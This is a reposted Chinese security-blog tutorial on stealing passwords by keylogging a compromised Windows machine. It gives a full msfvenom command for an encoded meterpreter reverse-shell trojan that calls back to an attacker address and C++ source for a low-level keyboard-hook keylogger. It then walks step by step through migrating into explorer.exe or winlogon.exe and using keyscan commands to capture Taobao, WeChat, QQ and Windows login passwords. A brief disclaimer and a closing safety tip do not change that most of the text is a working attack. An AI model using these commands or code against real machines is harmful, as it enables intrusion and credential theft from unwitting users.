当前位置:首页 > 实用技巧 >

远程键盘操作能记录下来吗(远程操作有记录吗)

来源:原点资讯(www.yd166.com)时间:2023-06-16 02:57:56作者:YD166手机阅读>>

声明:本篇内容禁止用作非法目的,谢绝一切形式的转载

当你在登陆电脑的时候,当你在登陆淘宝的时候,当你在登陆微信的时候,你的输入可能正在被记录,然后电脑的登陆密码、微信帐号密码、淘宝的帐号密码就这样在不知不觉中泄漏了。 @[toc]

木马生成

生成木马的命令如下,本文基于的是win7 32位系统,64位的可参考这里

sudo msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.42.49 lport=8888 -e x86/shikata_ga_nai -i 5 -f exe -o win32_burning.exe

开启监听

远程键盘操作能记录下来吗,远程操作有记录吗(1)

具体含义可参见这里

一个简单的键盘记录器

使用低级键盘钩子来hook键盘消息。 核心代码如下:

// keyboardhook.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include<iostream>#include<windows.h>using namespace std;HHOOK g_Hook;LRESULT CALLBACK LowLevelKeyboardProc(INT nCode, WPARAM wParam, LPARAM lParam){ KBDLLHOOKSTRUCT *pkbhs = (KBDLLHOOKSTRUCT *)lParam; BOOL bControlKeyDown = 0; switch (nCode) { case HC_ACTION: { // Check to see if the CTRL key is pressed bControlKeyDown = GetAsyncKeyState (VK_CONTROL) >> ((sizeof(SHORT) * 8) - 1); //Check to see if the Cap is pressed BOOL bCap = GetAsyncKeyState(VK_CAPITAL) >> ((sizeof(SHORT) * 8) - 1); //Disable CTRL ESC if (pkbhs->vkCode == VK_ESCAPE && bControlKeyDown) return 1; if(wParam == WM_KEYUP) printf("%c", pkbhs->vkCode); break; } } //Passes the hook information to the next hook procedure in the current hook chain. A hook procedure can call this function either before or after processing the hook information. return CallNextHookEx(g_Hook, nCode, wParam, lParam); //回调 //return 1;}int _tmain(int argc, _TCHAR* argv[]){ msg msg; //Installs an application-defined hook procedure into a hook chain. You would install a hook procedure to monitor the system for certain types of events. These events are associated either with a specific thread or with all threads in the same desktop as the calling thread. g_Hook=(HHOOK)SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)LowLevelKeyboardProc, GetModuleHandleW(0),0); while(GetMessageW(&msg,0,0,0))DispatchMessageW(&msg); return 0;}

meterpreter获取键盘输入

三个关键命令

keyscanstart开启键盘监听后,再用keyscandump进行记录的导出,如果不想监听了才keyscanstop。而不是先keyscanstop再keyscan_dump。

获取淘宝帐号密码

淘宝网的登陆页面如下:

远程键盘操作能记录下来吗,远程操作有记录吗(2)

在前面的介绍中,已经获得了meterpreter。如果能知道"肉鸡"端用户的输入,密码自然就轻易获得了。那怎样能获得用户的键盘输入那?

绑定进程

获取到meterpreter之后直接开启键盘监听是无法获取到上图中的键盘的输入的,因为进程空间是不对的,所以,首先需要选择正确的进程。通过ps命令可以查看肉鸡的所有进程。

远程键盘操作能记录下来吗,远程操作有记录吗(3)

其中的explorer.exe是Windows程序管理器或者文件资源管理器,它用于管理Windows图形壳,包括桌面和文件管理,删除该程序会导致Windows图形界面无法使用。因此对于windows中图形界面相关的输入内容都可以通过migrate(迁移)到这个进程中实现键盘记录。迁移进程使用 migrate pid号。

开启键盘记录
  1. 开启键盘监听 keyscan_start
  2. 导出记录 keyscan_dump。如下所示,帐号和密码都被dump出来了。
  3. 关闭监听 keyscan_stop

微信,qq等帐号密码的获取方式基本相同。

获取电脑的帐号密码

远程键盘操作能记录下来吗,远程操作有记录吗(4)

如果此时你的输入被记录下来,那密码自然也就没什么秘密了。

这个进程和explore.exe进程不同,需要的是上面列出的winlogon.exe。winlogon.exe是Windows NT 用户登陆程序,用于管理用户登录和退出。该进程的正常路径应是C:\Windows\System32,且是以 SYSTEM 用户运行。

绑定进程

migrate 进程pid

开启键盘记录
  1. 开启键盘监听 keyscan_start
  2. 导出记录 keyscan_dump。密码被dump出来了。注意:这个在切换用户的时候是不能获取到键盘的输入的。当锁定账户时是可用的,多数用来获得管理员密码。
  3. 关闭监听 keyscan_dump

写在最后

不名来历的连接不要点击,更不要运行。同时希望相应的厂商能再增加一下安全措施,让这种键盘记录不能生效。

又是一年高考时,2020年的高考来的稍晚一些。天公作美,诸事大吉。把蒲松龄自勉的一句话送给考生:有志者,事竟成,破釜沉舟,百二秦关终属楚;苦心人,天不负,卧薪尝胆,三千越甲可吞吴。

公众号

更多网络安全内容,欢迎关注我的公众号:无情剑客。

远程键盘操作能记录下来吗,远程操作有记录吗(5)

栏目热文

远程键盘操作教程(键盘操作手机教程)

远程键盘操作教程(键盘操作手机教程)

无论手机输入法如何优化,在手机录入大量的文字也是非常不现实的,因此很多商旅用户都会随身携带迷你蓝牙键盘,随时与手机连接待...

2023-06-16 03:01:18查看全文 >>

通过ap面板无法唤醒电脑(ap面板可以连接电脑吗)

通过ap面板无法唤醒电脑(ap面板可以连接电脑吗)

电脑的休眠功能,为长时间不用的电脑进行了关闭显示、硬盘停转的深度节能模式,不仅节约能源,还保护的设备;但有些时候也会出现...

2023-06-16 02:44:04查看全文 >>

为什么远程键盘使用不了(远程控制键盘无反应)

为什么远程键盘使用不了(远程控制键盘无反应)

IT之家4月6日消息 Intel近期宣布,他们将停止支持Remote Keyboard(远程键盘)App的支持,该公司确...

2023-06-16 02:42:41查看全文 >>

todesk远程键盘用不了(todesk远程进去点鼠标没反应)

todesk远程键盘用不了(todesk远程进去点鼠标没反应)

随着科技的发展,智能手机从原来的只能发短信,打电话的电子设备变成了可以处理文档、可以播放音乐、可以播放视频...的全能的...

2023-06-16 03:02:31查看全文 >>

远程操作键盘用不了(远程操作怎么控制对方的电脑)

远程操作键盘用不了(远程操作怎么控制对方的电脑)

关于远程控制鼠标和键盘的那些事在我们使用远程电脑控制软件时候,见得最多的除了画面,就是鼠标和键盘的操作了,那些远程控制的...

2023-06-16 02:34:00查看全文 >>

远程操作软键盘怎么用(远程电脑软键盘怎么打开)

远程操作软键盘怎么用(远程电脑软键盘怎么打开)

大家好,我是老盖,感谢观看本篇文章,本文做的也有视频,也可以看我发布的视频。今天给大家讲一下系统自带的一个屏幕键盘,它能...

2023-06-16 02:20:53查看全文 >>

todesk远程键盘设置(todesk怎么设置允许远程设备)

todesk远程键盘设置(todesk怎么设置允许远程设备)

Mac和Windows之间的不同总是让人感到困惑,快捷键不兼容、操作方式不同,要是想跨系统操作就更是麻烦,ToDesk远...

2023-06-16 02:29:14查看全文 >>

ukey插到电脑上不亮(ukey换了电脑还能用吗)

ukey插到电脑上不亮(ukey换了电脑还能用吗)

电脑突然就不能识别网银U盾或者以前没用过的USB设备(不是U盘),插上后,电脑无法识别识别,没有盘符出现,设备管理器中显...

2023-06-16 02:43:52查看全文 >>

ukey换电脑了怎么用不了(电脑怎么安装ukey)

ukey换电脑了怎么用不了(电脑怎么安装ukey)

税务UKey版开票软件部分常见问题处理方法,建议分享收藏,遇到问题时,方便随时查阅问题一更换电脑数据恢复失败,显示税务U...

2023-06-16 02:51:05查看全文 >>

远程桌面如何打开虚拟键盘(Mac如何打开虚拟键盘)

远程桌面如何打开虚拟键盘(Mac如何打开虚拟键盘)

1. 远程连接桌面按住win R输入mstsc2. 打开虚拟键盘按住win R输入OSK3. 查询电脑配置按住win R...

2023-06-16 02:47:09查看全文 >>

文档排行